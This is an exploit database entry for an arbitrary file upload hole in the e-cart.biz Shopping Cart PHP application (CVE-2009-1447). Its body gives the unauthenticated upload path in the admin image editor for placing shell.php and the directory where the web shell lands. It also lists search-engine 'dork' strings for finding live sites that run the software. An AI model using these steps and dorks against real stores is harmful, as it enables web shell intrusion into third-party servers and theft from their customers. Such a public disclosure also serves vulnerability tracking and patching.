EXPLOITS

e-cart.biz Shopping Cart - Arbitrary File Upload

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2009-04-16  
date_updated:   
verified: 1  
codes: OSVDB-53803;CVE-2009-1447  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8474.txt  

                =-=-Remote Arbitrary File Upload-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::e-cart Shopping Carts
-------------------------------------------------
Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.e-cart.biz/e-cart_Free.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
upload:
/path/admin/editor/image.php --> upload shell.php

shell.php ---> /path/images/upload/shell.php

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=-=-=-

dork:
"Powered by e-cart.biz Shopping Carts & Storefronts"
"Powered by e-cart.biz Shopping Carts"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2009-04-17]